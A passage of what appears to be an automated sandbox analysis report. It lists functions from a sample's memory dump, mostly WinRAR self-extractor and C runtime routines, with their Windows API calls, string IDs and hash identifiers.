                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: 109bbb9c23b7bc429816bc17f7f1d542579174700d77b6688d2448a136e04ba8
                                                                                              • Instruction ID: 1742383f225826533b5b04df2405bcb45150b5cc5306972bdcda68f56b8e562d
                                                                                              • Opcode Fuzzy Hash: 109bbb9c23b7bc429816bc17f7f1d542579174700d77b6688d2448a136e04ba8
                                                                                              • Instruction Fuzzy Hash: BD41CF75804214AFCB21AFB0ED4DB6B7BA9EF48701F144659FD899A062DB70D805CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3A975 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 176396367-3743748572
                                                                                              • Opcode ID: b539b7cdfcb77c18a12d3129e5ba3ea19c4b0dd32536211457352db098566bbf
                                                                                              • Instruction ID: 02fe5cf9f2a86877b8c05535fd7b714866016fbe5844ea21fcb86443ce8384b3
                                                                                              • Opcode Fuzzy Hash: b539b7cdfcb77c18a12d3129e5ba3ea19c4b0dd32536211457352db098566bbf
                                                                                              • Instruction Fuzzy Hash: 19315B77E44751A7D630AB54AD42B7A73E4EBA0760F20841FF8C657280FB64AD84C3A7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4DA64 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A4DA28: _free.LIBCMT ref: 00A4DA51
                                                                                              • _free.LIBCMT ref: 00A4DAB2
                                                                                                • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
                                                                                                • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
                                                                                              • _free.LIBCMT ref: 00A4DABD
                                                                                              • _free.LIBCMT ref: 00A4DAC8
                                                                                              • _free.LIBCMT ref: 00A4DB1C
                                                                                              • _free.LIBCMT ref: 00A4DB27
                                                                                              • _free.LIBCMT ref: 00A4DB32
                                                                                              • _free.LIBCMT ref: 00A4DB3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                              • Instruction ID: 73359e784e9075161e690b28c83d24a0d0a42eb578b6879e4d3bca34777a99ef
                                                                                              • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                              • Instruction Fuzzy Hash: A011E635984B04BAD530F7B1CD07FCBB7ECAFA0300F800C24B29E66152DA34B4114742
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F77A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A3F7F5,00A3F758,00A3F9F9), ref: 00A3F791
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A3F7A7
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A3F7BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 667068680-1718035505
                                                                                              • Opcode ID: aa333cc4c7af238820bc1f0adba6a6e567addf45234548d8f8612773de5b45fd
                                                                                              • Instruction ID: 08abf680f6bf393433ca34cab60a12d54fdb0d9b71075673671b57521087748d
                                                                                              • Opcode Fuzzy Hash: aa333cc4c7af238820bc1f0adba6a6e567addf45234548d8f8612773de5b45fd
                                                                                              • Instruction Fuzzy Hash: 0AF0F672F713226F9F609FF45CC456B62DCBA15756B20083BFA51D3244E620CC8697D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A32799 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A327F1
                                                                                                • Part of subcall function 00A2C619: GetVersionExW.KERNEL32(?), ref: 00A2C63E
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A32815
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3282F
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A32842
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A32852
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A32862
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: cc2776c60e44c517ad6e699a41e3947751e409a6b3728d6903abe382ae285977
                                                                                              • Instruction ID: 8c52020ecb2068105187f972a5df7f4d6d2baa2aa0cb2eabc898d966922aedc8
                                                                                              • Opcode Fuzzy Hash: cc2776c60e44c517ad6e699a41e3947751e409a6b3728d6903abe382ae285977
                                                                                              • Instruction Fuzzy Hash: 4631F775108316ABC704DFA8D88499BBBF8BF9C714F005A2EF999C3210E730D549CBA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A43C8A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00A43C81,00A43A3C,00A40BF4), ref: 00A43C98
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A43CA6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A43CBF
                                                                                              • SetLastError.KERNEL32(00000000,00A43C81,00A43A3C,00A40BF4), ref: 00A43D11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 6f7b4dc5c1f3f355d5a97681326b49311f94a44dd957c4e27116b64963ab62ed
                                                                                              • Instruction ID: 6678186b2a727fcdee30c8a5d04a7e91928d247693bd604b26325e69ca82d3c6
                                                                                              • Opcode Fuzzy Hash: 6f7b4dc5c1f3f355d5a97681326b49311f94a44dd957c4e27116b64963ab62ed
                                                                                              • Instruction Fuzzy Hash: F301F73F6197225EAE1427B8BDC6B6B2B64FBC5779F300629F610610E1EF915C429680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4A515 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00A63070,00A45982,00A63070,?,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4A519
                                                                                              • _free.LIBCMT ref: 00A4A54C
                                                                                              • _free.LIBCMT ref: 00A4A574
                                                                                              • SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A581
                                                                                              • SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A58D
                                                                                              • _abort.LIBCMT ref: 00A4A593
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: b43b4adc3bb195d1644a7f909b7f01825da6608f8df44a7fc2132e77a0d322ae
                                                                                              • Instruction ID: fe4c4f1ee539a125a9df19eae9e38f9e57032920fe719c4b2164b407a3e6064f
                                                                                              • Opcode Fuzzy Hash: b43b4adc3bb195d1644a7f909b7f01825da6608f8df44a7fc2132e77a0d322ae
                                                                                              • Instruction Fuzzy Hash: 81F0283D1C0A00A7D201B3746F0AF2B1A759BE1771F350118FA1D931D2FE758D425523
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2D4D2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
                                                                                                • Part of subcall function 00A2CD5C: _wcsrchr.LIBVCRUNTIME ref: 00A2CD73
                                                                                              • _wcslen.LIBCMT ref: 00A2D5A4
                                                                                              • _wcslen.LIBCMT ref: 00A2D5EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: aceda0cb4e675f6a6e50b88cfb90cf7217e15f75178d10ec5031c6e4e6ac9dd7
                                                                                              • Instruction ID: 284c20c189cb30f52795f7cf99c258063d6f0074b3d64330de64e1fca2c4990d
                                                                                              • Opcode Fuzzy Hash: aceda0cb4e675f6a6e50b88cfb90cf7217e15f75178d10ec5031c6e4e6ac9dd7
                                                                                              • Instruction Fuzzy Hash: 1D4137229043709AC731AF78A842A7B73B8FF55759F14492EF8865B182E7A08D81C391
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2CF32 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00A2B505,?,?,00000800,?,?,00A2B4CA,?), ref: 00A2CFF4
                                                                                              • _wcslen.LIBCMT ref: 00A2D06A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 3341907918-253988292
                                                                                              • Opcode ID: cbe272e0bebd193a9c1d14f3448d0028de2b799459b0b68da84b7bcf6a6675ed
                                                                                              • Instruction ID: a978e5186bbbf5d43e6a8d1506af91328aaa56d61b614b358d9dcc9008821cb6
                                                                                              • Opcode Fuzzy Hash: cbe272e0bebd193a9c1d14f3448d0028de2b799459b0b68da84b7bcf6a6675ed
                                                                                              • Instruction Fuzzy Hash: 4B41E531408229BACF21AF68ED01EEE777ABF49351F104435FC96A3066D774D996CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C8CD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00A3C8DD
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00A3C902
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A3C934
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A3C957
                                                                                                • Part of subcall function 00A3B6D2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00A3C92D,00000066), ref: 00A3B6E5
                                                                                                • Part of subcall function 00A3B6D2: SizeofResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B6FC
                                                                                                • Part of subcall function 00A3B6D2: LoadResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B713
                                                                                                • Part of subcall function 00A3B6D2: LockResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B722
                                                                                                • Part of subcall function 00A3B6D2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00A3C92D,00000066), ref: 00A3B73D
                                                                                                • Part of subcall function 00A3B6D2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00A3C92D,00000066), ref: 00A3B74E
                                                                                                • Part of subcall function 00A3B6D2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A3B7B7
                                                                                                • Part of subcall function 00A3B6D2: GlobalUnlock.KERNEL32(00000000), ref: 00A3B7D6
                                                                                                • Part of subcall function 00A3B6D2: GlobalFree.KERNEL32(00000000), ref: 00A3B7DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1428510222-3352871620
                                                                                              • Opcode ID: 5df8048082d6ff89ae8cb86ac0c838a684fe8670a9d52a594f4fb13c12810d4c
                                                                                              • Instruction ID: 579acaaaa5960b0b34a43531b6dbce47f575b4d1d009bbff2f3fd0fd1160d228
                                                                                              • Opcode Fuzzy Hash: 5df8048082d6ff89ae8cb86ac0c838a684fe8670a9d52a594f4fb13c12810d4c
                                                                                              • Instruction Fuzzy Hash: 0C01D2329007156BCB1177B49D0AB7F7ABAAF81B61F160124FE01B7292DF718C0697B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3E750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3E79B
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A3E7B1
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A3E7C5
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00A3E7D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              • Opcode ID: 90cfc665eb097c3ae47e21d0258627a14d8cc2b5ee38c7fd2c6b78b2dce9f2e1
                                                                                              • Instruction ID: 12210973696880fc35718fa99c8e50b5e395cf0d521781547b839a4e8ac8ea93
                                                                                              • Opcode Fuzzy Hash: 90cfc665eb097c3ae47e21d0258627a14d8cc2b5ee38c7fd2c6b78b2dce9f2e1
                                                                                              • Instruction Fuzzy Hash: 8701F732681310BFE211DFB89D4DFA77BADFF59B02F100511F701E60D0C6A269068B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A49235 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A491E6,00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002), ref: 00A49255
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A49268
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00A491E6,00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002), ref: 00A4928B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 4973e5fc61569997091a86e2a2e4754a7c6483bcbb476374176f63b2766d9022
                                                                                              • Instruction ID: 58370398abb1b603a7841678053a0e5ad310f14a64cad1dd3b71b4207db16380
                                                                                              • Opcode Fuzzy Hash: 4973e5fc61569997091a86e2a2e4754a7c6483bcbb476374176f63b2766d9022
                                                                                              • Instruction Fuzzy Hash: A6F04F74A00218BBDB11DBA4EC09BDFBFB4FB48756F000168F905B21A0DB745E95CA91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A30627 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
                                                                                                • Part of subcall function 00A31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A30646
                                                                                              • GetProcAddress.KERNEL32(00A6A1F0,CryptUnprotectMemory), ref: 00A30656
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              • Opcode ID: 16db74330875fa830478c072669fe87488867b81cb0ffead4c9f5379117c0cc8
